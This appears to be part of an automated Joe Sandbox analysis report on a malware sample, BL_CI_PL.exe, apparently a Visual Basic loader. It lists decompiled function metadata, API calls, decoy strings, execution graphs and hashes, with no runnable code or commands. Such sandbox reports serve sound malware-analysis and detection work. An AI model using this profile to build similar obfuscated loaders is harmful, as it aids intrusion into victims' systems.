                                                                                                                                                      Function 0041EF80, Relevance: 47.4, APIs: 23, Strings: 4, Instructions: 166COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • #536.MSVBVM60(?), ref: 0041EFE4
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EFEF
                                                                                                                                                      • #581.MSVBVM60(00000000), ref: 0041EFF6
                                                                                                                                                      • __vbaLenBstr.MSVBVM60(HOMESTAY), ref: 0041F007
                                                                                                                                                      • __vbaFpR8.MSVBVM60 ref: 0041F025
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F04A
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041F04F
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041F074
                                                                                                                                                      • #607.MSVBVM60(?,00000013,00000003), ref: 0041F084
                                                                                                                                                      • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041F092
                                                                                                                                                      • #690.MSVBVM60(ENTROCHITE,GYROVAGUE,Valvulate7,00000000), ref: 0041F0A8
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F0B1
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,00000003,?), ref: 0041F0C3
                                                                                                                                                      • #660.MSVBVM60(?,00000003,?,00000001,00000001), ref: 0041F0F4
                                                                                                                                                      • #520.MSVBVM60(?,?), ref: 0041F102
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041F10C
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F117
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000004,00000003,0000000A,?,?), ref: 0041F12F
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041F146
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,02BEEA7C,0040339C,0000004C), ref: 0041F16B
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033BC,00000028), ref: 0041F18B
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041F194
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041F1DA), ref: 0041F1D3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$CheckHresultList$#520#536#581#607#660#690BstrNew2
                                                                                                                                                      • String ID: ENTROCHITE$GYROVAGUE$HOMESTAY$Valvulate7
                                                                                                                                                      • API String ID: 4190706326-1299342816
                                                                                                                                                      • Opcode ID: 8f5b987e35f2ec7606d35262231ce329ce6383a57d20b8e20ebac44b1bcd4f25
                                                                                                                                                      • Instruction ID: 0963c0ff5cca27f308fad6ac89051ad50f40e35da3b53a542090e021b5ef2dd2
                                                                                                                                                      • Opcode Fuzzy Hash: 8f5b987e35f2ec7606d35262231ce329ce6383a57d20b8e20ebac44b1bcd4f25
                                                                                                                                                      • Instruction Fuzzy Hash: B16129B1900219EBCB00DFA4DD88EEEBBB8FF58705F10416AE545B61A0DBB4594ACF64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041E840, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 128COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041E889
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041E8A3
                                                                                                                                                      • #666.MSVBVM60(?,?), ref: 0041E8B1
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041E8BB
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E8CC
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041E8D8
                                                                                                                                                      • #618.MSVBVM60(?,00000091), ref: 0041E8EA
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E8F5
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(Lancetbladet6,00000000), ref: 0041E8FD
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E90F
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041E930
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,02BEEA7C,0040339C,00000014), ref: 0041E955
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000138), ref: 0041E982
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041E98B
                                                                                                                                                      • #702.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041E9AB
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E9B6
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E9BB
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041EA04), ref: 0041E9F7
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E9FC
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041EA01
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$CheckHresult$#618#666#702CopyListNew2
                                                                                                                                                      • String ID: Lancetbladet6$uvisneligheden$windir
                                                                                                                                                      • API String ID: 2448542732-203791292
                                                                                                                                                      • Opcode ID: d29c39177f904c345bc64b0d315ba15e092f5b7a5a24d43128f5d1073ad88c52
                                                                                                                                                      • Instruction ID: 47aa1b165fb1252179dd167978bfb3766ac59c33a5509a7222df503a4470d44a
                                                                                                                                                      • Opcode Fuzzy Hash: d29c39177f904c345bc64b0d315ba15e092f5b7a5a24d43128f5d1073ad88c52
                                                                                                                                                      • Instruction Fuzzy Hash: 83416375900219EBCB00DF95DE899DEBBB8FF58705F204226F512B32A0DB745A45CF94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041EA20, Relevance: 37.6, APIs: 25, Instructions: 121COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Construct2Destruct
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3342376363-0
                                                                                                                                                      • Opcode ID: 9fd6025e0b370815ac1b5673e180d7e23d0960f1d88fd19cd6d6d6df87afb83b
                                                                                                                                                      • Instruction ID: 02524ba4e16dbb763d465f474a7e9bc432b50fbab4924b42f19f87021a701a45
                                                                                                                                                      • Opcode Fuzzy Hash: 9fd6025e0b370815ac1b5673e180d7e23d0960f1d88fd19cd6d6d6df87afb83b
                                                                                                                                                      • Instruction Fuzzy Hash: 83418374E052899FDB04DBE8C4507AEFF76AF98300F14C19F895157383CA79990ACBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004059CD, Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 121COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __vbaVarDup.MSVBVM60(-00000001,00000000,6FA0D8B1), ref: 0041E1AE
                                                                                                                                                      • #632.MSVBVM60(?,?,000000E6,00000002), ref: 0041E1C5
                                                                                                                                                      • __vbaVarTstEq.MSVBVM60(?,?), ref: 0041E1EA
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,?), ref: 0041E206
                                                                                                                                                      • #536.MSVBVM60(?), ref: 0041E226
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E237
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E23C
                                                                                                                                                      • __vbaLenBstrB.MSVBVM60(Operationalise), ref: 0041E255
                                                                                                                                                      • #574.MSVBVM60(00000003,0000000A,000000FF,00000000), ref: 0041E270
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E27B
                                                                                                                                                      • #711.MSVBVM60(?,00000000), ref: 0041E282
                                                                                                                                                      • __vbaAryVar.MSVBVM60(00002008,?), ref: 0041E291
                                                                                                                                                      • __vbaAryCopy.MSVBVM60(?,?), ref: 0041E2A8
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E2B1
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,00000003,0000000A,?), ref: 0041E2C5
                                                                                                                                                      • #554.MSVBVM60 ref: 0041E2CA
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041E312), ref: 0041E2FF
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041E30B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$ListMove$#536#554#574#632#711BstrCopyDestruct
                                                                                                                                                      • String ID: NEGLIGERS$Operationalise$PREFAVOURABLY
                                                                                                                                                      • API String ID: 398136637-198126775
                                                                                                                                                      • Opcode ID: d2f11c0ce752d2bd4cabba61ce92aac43d7a43ccd7c6074f04afe587d5876be8
                                                                                                                                                      • Instruction ID: 38f994a8dfd74e6f1cad4b032ee14f29bc86f162e9263eb00b9369606973fe45
                                                                                                                                                      • Opcode Fuzzy Hash: d2f11c0ce752d2bd4cabba61ce92aac43d7a43ccd7c6074f04afe587d5876be8
                                                                                                                                                      • Instruction Fuzzy Hash: 82510CB1C00209AFDB04DFE4D949AEEBBB8FB48704F10C16AE515B72A0DB741649CFA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041DC00, Relevance: 25.6, APIs: 17, Instructions: 97COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Copy$Move$#536#587#606#714List
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 273173519-0
                                                                                                                                                      • Opcode ID: 619c58d87b8fe4f01bb7ea556dc5236fe84266fce0fd916c1cb3d71b7f9687a3
                                                                                                                                                      • Instruction ID: bfde619d84bb90be070530207f6e300fcc69702f38a34c5a455dbc29fa1c03b8
                                                                                                                                                      • Opcode Fuzzy Hash: 619c58d87b8fe4f01bb7ea556dc5236fe84266fce0fd916c1cb3d71b7f9687a3
                                                                                                                                                      • Instruction Fuzzy Hash: 7941A7B5C1021DABCB04DF94ED859DDBBB8FF98704F10811AE912B7264DB746A05CF94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405A42, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003), ref: 0041FE69
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041FE85
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,02BEEA7C,0040339C,00000014), ref: 0041FEAA
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,0000013C), ref: 0041FEF8
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041FF01
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$CheckFreeHresult$ListNew2
                                                                                                                                                      • String ID: srlove
                                                                                                                                                      • API String ID: 701738313-3382764130
                                                                                                                                                      • Opcode ID: fea6a7b0d1881d11062fc9a9eeba015c355c60c1b8c8cbc941345846f581bc2b
                                                                                                                                                      • Instruction ID: 418858752d4c2873a02f642b83f060fe3661e5cb0077d77064b8a6a3a28e02b2
                                                                                                                                                      • Opcode Fuzzy Hash: fea6a7b0d1881d11062fc9a9eeba015c355c60c1b8c8cbc941345846f581bc2b
                                                                                                                                                      • Instruction Fuzzy Hash: 83319271E00308AFDB14DFA4D985A9EBBB8EF48700F10802EE509F72A1D678550ACB59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Analysis Process: BL_CI_PL.exe PID: 432 Parent PID: 1880 BL_CI_PL.exeCOMMON

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:0.1%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:22
                                                                                                                                                      Total number of Limit Nodes:1

                                                                                                                                                      Graph

                                                                                                                                                      execution_graph 66683 1e8f2b20 66685 1e8f2b2a 66683->66685 66686 1e8f2b3f LdrInitializeThunk 66685->66686 66687 1e8f2b31 66685->66687 66688 1e958305 66701 1e8f2b10 LdrInitializeThunk 66688->66701 66690 1e95834d 66693 1e9583c4 66690->66693 66702 1e8f0554 11 API calls 66690->66702 66692 1e9583ff 66693->66692 66703 1e8f2b90 LdrInitializeThunk 66693->66703 66695 1e95837b 66695->66693 66704 1e96fdce LdrInitializeThunk 66695->66704 66697 1e95841e 66697->66693 66705 1e8f2ed0 LdrInitializeThunk 66697->66705 66699 1e958430 66699->66693 66706 1e8f2da0 LdrInitializeThunk 66699->66706 66701->66690 66702->66695 66703->66692 66704->66697 66705->66699 66706->66693 66707 573a84 66708 573a8b 66707->66708 66708->66707 66709 573a5a TerminateThread 66708->66709 66710 573a71 66708->66710 66709->66710 66717 1e8f29f0 LdrInitializeThunk

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 1E8F2EB0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 88fd6c9de44fb72efa7e9f7265ee54093d383d513705c5d4a0a2068e80adbb17
                                                                                                                                                      • Instruction ID: fc3192315acec6bd124f44b7ccf4842f654bf0b2b02bc553667b7fb4015ac7e1
                                                                                                                                                      • Opcode Fuzzy Hash: 88fd6c9de44fb72efa7e9f7265ee54093d383d513705c5d4a0a2068e80adbb17
                                                                                                                                                      • Instruction Fuzzy Hash: E790023130190402D510A159491474F405947D0702FD1C519A5258D15DC63588517971
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2ED0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 2c04b6a548bb081448583b27eb85d4f77c3361fc09572b050241ba3206bcd828
                                                                                                                                                      • Instruction ID: c229757afbc08cb861b9a433bf2d4646d3d44038f2b20d48e84fc0771fe3f22a
                                                                                                                                                      • Opcode Fuzzy Hash: 2c04b6a548bb081448583b27eb85d4f77c3361fc09572b050241ba3206bcd828
                                                                                                                                                      • Instruction Fuzzy Hash: 49900231701500424550B169894494A80596BE17117D1C629A4A8CD10DC56988656A65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 973e47f33a5af327bb4c05ef00d0f000f8761aa20ca0ed193a5b50d92bb5ea3e
                                                                                                                                                      • Instruction ID: 6f410dffa3302cff3b83860d36e2fcec3011bcfaab951589bf0e5c1d7217709f
                                                                                                                                                      • Opcode Fuzzy Hash: 973e47f33a5af327bb4c05ef00d0f000f8761aa20ca0ed193a5b50d92bb5ea3e
                                                                                                                                                      • Instruction Fuzzy Hash: E990027134150442D510A1594514B4A405987E1701FD1C51DE5158D14DC629CC527526
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: faf1d9b54e5bc383c84c6af35ed9f3dccb39e4457b13183b0da15d0d48a407fc
                                                                                                                                                      • Instruction ID: 01c156506c63684d655ef95a2344770b306a3f6baed16c291f0652bbf7a8a76e
                                                                                                                                                      • Opcode Fuzzy Hash: faf1d9b54e5bc383c84c6af35ed9f3dccb39e4457b13183b0da15d0d48a407fc
                                                                                                                                                      • Instruction Fuzzy Hash: ED900231311D0042D610A5694D14B4B405947D0703FD1C61DA4248D14CC92588616921
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2CF0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 17edecefd54734d167448389fdb318cc658beaefaf543e2b71372a2d53da04d1
                                                                                                                                                      • Instruction ID: 487471a6aa0da6216f5802d91d96a7235c37ea1fa1e6975287abdd5d52ff4823
                                                                                                                                                      • Opcode Fuzzy Hash: 17edecefd54734d167448389fdb318cc658beaefaf543e2b71372a2d53da04d1
                                                                                                                                                      • Instruction Fuzzy Hash: 74900231342541525955F159450454B805A57E07417D1C51AA5508D10CC5369856EA21
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 206 1e8f2c30-1e8f2c3c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 671ccd263b5ffefbfcc9a5ead14c9d9c8fd07af57e899fce6f169a342502d5af
                                                                                                                                                      • Instruction ID: bb4cbd1612fd5ac574f34cc7a06d1ac11a8a4f528c958516ec854e2d6fc9a057
                                                                                                                                                      • Opcode Fuzzy Hash: 671ccd263b5ffefbfcc9a5ead14c9d9c8fd07af57e899fce6f169a342502d5af
                                                                                                                                                      • Instruction Fuzzy Hash: 7890023931350002D590B159550864E405947D1702FD1D91DA4109D18CC92588696721
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2C50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 207 1e8f2c50-1e8f2c5c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: fd111e0d5c6899b638d861eb73e24331fa0c4868ec45f533a6f0ef9498ffd671
                                                                                                                                                      • Instruction ID: d55a515f6fbb46975e65e5835f1dd5dfb036f9df2c0e545818e71064b9493f31
                                                                                                                                                      • Opcode Fuzzy Hash: fd111e0d5c6899b638d861eb73e24331fa0c4868ec45f533a6f0ef9498ffd671
                                                                                                                                                      • Instruction Fuzzy Hash: D190023130150003D550B159551864A805997E1701FD1D519E4508D14CD92588566622
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2DA0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: f39449a53a306ce0b5b16df625fc2725053d6a70473c4affe51e80c2c9ba2aab
                                                                                                                                                      • Instruction ID: 17d2f67468216d21e81c1212b8b60dd1727531c03e49455f0fcf2f87df75c001
                                                                                                                                                      • Opcode Fuzzy Hash: f39449a53a306ce0b5b16df625fc2725053d6a70473c4affe51e80c2c9ba2aab
                                                                                                                                                      • Instruction Fuzzy Hash: BA90023170150502D511B159450465A405E47D0741FD1C52AA5118D15ECA358992B531
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

